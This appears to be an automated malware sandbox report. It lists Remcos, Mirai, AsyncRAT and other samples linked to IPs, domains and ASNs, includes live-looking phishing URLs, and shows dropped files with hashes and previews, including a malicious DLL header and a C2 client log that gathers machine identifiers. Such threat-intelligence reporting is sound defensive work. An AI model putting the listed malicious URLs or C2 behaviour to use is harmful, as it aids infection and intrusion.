                                                                                                                        31.3.152.100ZJYhnDLhwa.exeGet hashmaliciousRemcosBrowse
                                                                                                                          ZfigYV6HXd.exeGet hashmaliciousRemcosBrowse
                                                                                                                            g4E1F7Lc2O.exeGet hashmaliciousRemcosBrowse
                                                                                                                              yVhvGnsUpL.exeGet hashmaliciousRemcosBrowse
                                                                                                                                BoFA_Remittance Advice_21219.xlsmGet hashmaliciousRemcos DBatLoaderBrowse
                                                                                                                                  IQl00lxPjo.exeGet hashmaliciousRemcosBrowse

                                                                                                                                    Domains

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    reseed.i2pgit.orgDF2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 68.183.196.133
                                                                                                                                    reseed.memcpy.iofile.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 95.216.2.172
                                                                                                                                    bg.microsoft.map.fastly.netjaTDEkWCbs.exeGet hashmaliciousQuasarBrowse
                                                                                                                                    • 199.232.210.172
                                                                                                                                    3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 199.232.210.172
                                                                                                                                    N5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                    • 199.232.214.172
                                                                                                                                    Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                                                                    • 199.232.214.172
                                                                                                                                    N5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                    • 199.232.210.172
                                                                                                                                    setup64v9.3.4.msiGet hashmaliciousUnknownBrowse
                                                                                                                                    • 199.232.210.172
                                                                                                                                    KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                    • 199.232.210.172
                                                                                                                                    c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                    • 199.232.214.172
                                                                                                                                    phishingtest.emlGet hashmaliciousUnknownBrowse
                                                                                                                                    • 199.232.214.172
                                                                                                                                    a36r7SLgH7.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                    • 199.232.214.172

                                                                                                                                    ASNs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    VERSATELASfortheTrans-EuropeanTele2IPTransportbackboz0r0.i686.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 62.58.31.151
                                                                                                                                    3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 82.174.140.190
                                                                                                                                    kwari.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 143.185.252.107
                                                                                                                                    botx.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 87.208.168.138
                                                                                                                                    loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 87.208.130.132
                                                                                                                                    armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 62.59.121.44
                                                                                                                                    nabarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 87.215.239.164
                                                                                                                                    nklspc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 87.208.121.121
                                                                                                                                    jklmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 87.212.252.199
                                                                                                                                    armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 143.186.106.176
                                                                                                                                    EKSENBILISIMTRhttps://google.co.ve/url?6q=emgjbxlJLi6z73yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fsoftilac.com.tr%2f7yoya/jiehcuo2ndtn1/ZHRob3JuZUBpa2FzZ3JvdXAuY29t%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9AGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 45.143.99.90
                                                                                                                                    https://linktr.ee/priyanka662Get hashmaliciousGabagoolBrowse
                                                                                                                                    • 147.79.74.176
                                                                                                                                    https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.htmlGet hashmaliciousGabagoolBrowse
                                                                                                                                    • 147.79.74.176
                                                                                                                                    Iamgold-PYMPATA Policy_Enrollment2024739441.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 147.79.74.176
                                                                                                                                    https://linklock.titanhq.com/analyse?url=https%3A%2F%2Fmyarrowleaf1-my.sharepoint.com%2F%3Af%3A%2Fg%2Fpersonal%2Fmarge_penrod_myarrowleaf_org%2FElQV40bjfBZKivPSKIPxGuYBa20TAVuQG9ya4YrQRKjHiQ%3Fe%3D7nML8f&data=eJxVzctugzAQBdCvMbtGBqOkWXhBlOYhUiW0VaR0gyZgGyL80Ng05e8L6aaVZlZz7p2Kz5PlPI1BxBQqFtW8qkF14P2ssjrSfEEPxukjHONsHXlusRboSUrN_aG0VA-IPFyxVU0QOB7_dfS8CcF5wjKSbMbRAyDaeydAxk96mPkGUDjbmjDxybBM_mo1rhv_WQPdlARUonTCoK3LPzWlxUm-dMU5pdebXH3m7dfpPd-fvrf9ZQUJ_cjOfbFdDpBesHjLb7u2IGwjCFsvzOvhWf4A0NhYxQ%25%25Get hashmaliciousUnknownBrowse
                                                                                                                                    • 147.79.74.176
                                                                                                                                    scan3762399_arleen@wcctxlaw.com.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 147.79.74.176
                                                                                                                                    QeTCfhacvf.exeGet hashmaliciousOrcusBrowse
                                                                                                                                    • 45.10.151.182
                                                                                                                                    ACTION REQUIRED Revised Billing #NL992-071 From Robinson Aviation Inc.msgGet hashmaliciousUnknownBrowse
                                                                                                                                    • 147.79.74.176
                                                                                                                                    xxTupY4Fr3.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                    • 147.79.119.141
                                                                                                                                    https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0Get hashmaliciousUnknownBrowse
                                                                                                                                    • 147.79.74.176
                                                                                                                                    COGECOWAVECAfuckunix.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 72.38.100.18
                                                                                                                                    armv5l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 24.150.83.227
                                                                                                                                    mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                    • 24.146.42.207
                                                                                                                                    sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                    • 67.193.39.24
                                                                                                                                    nklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 72.38.18.85
                                                                                                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 67.193.241.92
                                                                                                                                    nshkppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 24.150.27.115
                                                                                                                                    la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 24.57.77.99
                                                                                                                                    la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 24.55.242.244
                                                                                                                                    arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                    • 192.69.236.66
                                                                                                                                    ALTUSNL.jmhgeojeri.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 37.46.126.216
                                                                                                                                    7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 37.46.117.34
                                                                                                                                    fACYdCvub8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 37.46.119.36
                                                                                                                                    7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 37.46.117.21
                                                                                                                                    https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fwe4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20=Get hashmaliciousUnknownBrowse
                                                                                                                                    • 213.5.71.85
                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 79.142.69.160
                                                                                                                                    https://www.ccjm.org/highwire_log/share/mendeley?link=https://onpro.infoGet hashmaliciousUnknownBrowse
                                                                                                                                    • 213.5.70.137
                                                                                                                                    http://www.tellthedream.com/wpp-adobe/adobe.phpGet hashmaliciousUnknownBrowse
                                                                                                                                    • 213.5.70.137
                                                                                                                                    sVfXReO3QI.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 37.46.119.50
                                                                                                                                    http://merakibay.co.uk/wp-includes/merakibay/10pdf/wp-page202/pdfzipfilemailpagejkkgenhtdriyryhdej.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 213.5.71.85

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    No context

                                                                                                                                    Dropped Files

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllDF2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      ET5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllDF2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          ET5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllDF2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              ET5.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_44ed98c1-fa7d-497f-b5ef-71a509acd2a0\Report.wer

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):65536
                                                                                                                                                Entropy (8bit):0.9807208625347982
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:Ld3m6Q/d0MALS36j1TEzuiFcJZ24lO8l:Bm1/eMALXj1ozuiFcJY4lO8l
                                                                                                                                                MD5:A4230802BDFCD187DBD5A5AC81982196
                                                                                                                                                SHA1:F1CD46D4048EF13D913F69465BAFC8A7C4CA1A17
                                                                                                                                                SHA-256:8B4FCA86B22A6D8F60EEB574A632F12AB215966FE1FF3FA27E6C9B317BA07DD0
                                                                                                                                                SHA-512:54C861C11691B8643186D1D00BED7764733119C7D546CF82026AE3AFAB4FE4D4BF4FC83E964A9B3B688C29F0F84A74D71F0524562FD3169508E17423FDD98458
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.5.6.9.4.3.4.5.3.2.6.2.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.5.6.9.4.3.5.7.0.4.4.8.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.e.d.9.8.c.1.-.f.a.7.d.-.4.9.7.f.-.b.5.e.f.-.7.1.a.5.0.9.a.c.d.2.a.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.c.5.3.e.9.f.9.-.0.8.a.b.-.4.d.4.3.-.b.4.c.5.-.f.e.f.e.d.9.3.e.5.9.b.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.a.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.7.c.-.0.0.0.0.-.0.0.1.4.-.e.5.c.2.-.b.0.c.e.9.1.5.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.1.8.d.4.3.1.0.6.5.7.e.8.3.6.8.5.5.7.f.1.8.3.e.1.5.c.4.7.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.d.b.8.9.6.1.f.8.a.f.b.9.9.9.a.e.c.e.6.0.b.f.1.e.f.3.e.4.9.e.8.e.2.3.4.9.f.7.b.!.m.a.i.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.0.1././.0.1.:.0.0.:.0.0.:.0.0.!.1.9.

                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER7EC2.tmp.dmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Sun Jan 5 16:50:34 2025, 0x1205a4 type
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):636854
                                                                                                                                                Entropy (8bit):1.0036505838068654
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:qSC5cq+GwguFtH+Exz2j9nZJo9FPMWp//Na2hQOFLI0:efE/BQO
                                                                                                                                                MD5:A1A600A99E372941548F05089B61875C
                                                                                                                                                SHA1:BD55A72E3B5CBEE973A54FE41F58D78D1F24FF47
                                                                                                                                                SHA-256:CAC0839E32428A22C3AA4D1FA5F2DB1655CCF2A8FFDD1E55D6929AF3134B4D67
                                                                                                                                                SHA-512:14C49C15A5E2DE417D125305C1696ACAC25E3207EDD2D0AB612DFFDBE6516CE8D368BDC33D906F6EDBE09F90457B80BE4A4A4419EBA3142FC9C95CD3A346D85A
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MDMP..a..... .......Z.zg............$...........(...8...........` ..........h...........`.......8...........T............0..............\!..........H#..............................................................................eJ.......#......Lw......................T.......|...".zg.............................@..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER81FF.tmp.WERInternalMetadata.xml

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6734
                                                                                                                                                Entropy (8bit):3.718402035734142
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:RSIU6o7wVetb/Tv8nDYHV447Z5aM4UB89bfm1DbUfc+Vm:R6l7wVeJ/Tv4YHxprB89bfq8fzVm
                                                                                                                                                MD5:CAF8C97EA4C67DEA614F449C39881061
                                                                                                                                                SHA1:8D9CF301497C6F4E4A98F2F70D994ACCFCD4E4E1
                                                                                                                                                SHA-256:5AC3C6DE5F457FACFF6D5074B4C838C3F267DE2C24F331352FFB8CE3E2F6FF70
                                                                                                                                                SHA-512:02FC9488AE29A9FD1367FEBA8717EBE6EEC8FFDACEE191CF76C6B53B45B5A8F67BF2501DA078440107366930CA9A86B96F3CA7DF5ED719516A65E55F6BA5BD22
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.2.4.<./.P.i.

                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER823E.tmp.xml

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4603
                                                                                                                                                Entropy (8bit):4.415755310291748
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:cvIwWl8zsWJg771I9TwWpW8VYnYm8M4JD2+AFT3yq85/3jD4hA3+Mpd:uIjfsI70J7VvJwIDIA3Zpd
                                                                                                                                                MD5:464C5FC160B531C4EC3073C31D0B7656
                                                                                                                                                SHA1:4C85C77C144EE4ACCDB956F053DD3E62F31F733E
                                                                                                                                                SHA-256:EE94F3131555439EF542D06F14A3C961F8C7C58A80D9A88FAE4FC2EBC1273B9E
                                                                                                                                                SHA-512:2B3E484ECC1D4C6A85834440A04970CBCBB292F8209BF7FC6951CC49419F30B09A78356FAFFDA084F122F0A80C0340A4192E6ED7F9C6426E4856CB09B497ABCD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="662873" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER826B.tmp.csv

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):75382
                                                                                                                                                Entropy (8bit):3.047293772628709
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:SzymQDaHLE0U46X/gsm0a/A7Y+V+fYvI+b+X+L+S+f+4+t++vf:SzymQDaHLE0U46X/gsm0a47Y+V+fYvIs
                                                                                                                                                MD5:D4FA58ED702E7BD7F0C4B9581BFD49A8
                                                                                                                                                SHA1:0A3494AC4280F4E7AD34F5C87646414C95EABD8C
                                                                                                                                                SHA-256:8E558A37ABA47BCE3155CBB9B68BD9FB5CCE612BA16465405258BAC53BFEB063
                                                                                                                                                SHA-512:F74FE3CDEA02329657A12D51D7B521181C52D3B0A89364129053340EFB4BE48EF60F228B8B2DA4FF2E9F3948D36F2B11F46A7E89A28568DF1C448CADDEE11B91
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER8318.tmp.txt

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):13340
                                                                                                                                                Entropy (8bit):2.6857470957661005
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:TiZYW14cazPfYtYYYlWiHZYEZl8trie3Sq5wwme/wVa8kjGKMj+WIh/3:2ZDWcGg/Ug2vVa8kjGKMj+Rh/3
                                                                                                                                                MD5:DCE8DBC6879BC76E27C1C555AD120077
                                                                                                                                                SHA1:4EE2F18FAD750A443BE3CC016C5FA6A26492BD4A
                                                                                                                                                SHA-256:D56CFC8E38A0F06DCA95486DC7504DC132707B1FA18C3FA55476C27496CBA54A
                                                                                                                                                SHA-512:BCBA6BE3B5BAD97021F8540157933D467743706C563BDDDA02B2A709C4B27A597D98D2D828E68A3A0D831EC6DDCD75A2C36F5FB79BEB21D449BE1684EA41B7B5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):115712
                                                                                                                                                Entropy (8bit):6.193969228624904
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:55YoK6WOBqFp//wVUE/+TGAf5EkgE1duJmwTxOd/lZ1pgX7:55YoSb/Iv/+TNf5Ee1YLTxOd9Z16X7
                                                                                                                                                MD5:EC9499EE84ED09B77BE0A35EC87B781C
                                                                                                                                                SHA1:4148D40284BAB415DDB828BD4061A4FE93C9AF26
                                                                                                                                                SHA-256:5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
                                                                                                                                                SHA-512:D65933B825419719021D0D2F43B45616A5B1238550BFDC72D2F4F148E284E9FE488417021A45B6D2F61770E31150B3331B1071AFE7EBB85AF6B379D040A9BEBC
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: DF2.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: ET5.exe, Detection: malicious, Browse
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f...*..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2128
                                                                                                                                                Entropy (8bit):5.404753982480259
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:CFdHW54yclD8cm9FLQIU4bcPPf4bcPPTM94bcPPZ4bcPPy4bcPP84bcPPcWIeF8c:idH9N8J9VL3YPQYPTNYP6YPtYP/YPVHJ
                                                                                                                                                MD5:224F7A7D74F05A46B474AFF900E60DB1
                                                                                                                                                SHA1:8FFA0EFF57434CD49FD39736525EE28614B8B9C7
                                                                                                                                                SHA-256:E73758553E411869FDFEE4A270127A432371033ABFB7EB3E216036179C3A5D59
                                                                                                                                                SHA-512:5936BCEF0E7768A898C7F4A990DCBEBD536D7B1E894F8C2E8C6D22800359FFA4093D6776BA5C209C3214AB70344501A4116D052DAE23C6487DAB2B1A6487E6AD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[D] (ini_get_sec) -> Done(name=cnccli)..[D] (ini_get_var) -> Done(sec=cnccli,name=server_host,value=9

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\config.ini

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:Generic INItialization configuration [cnccli]
                                                                                                                                                Category:dropped
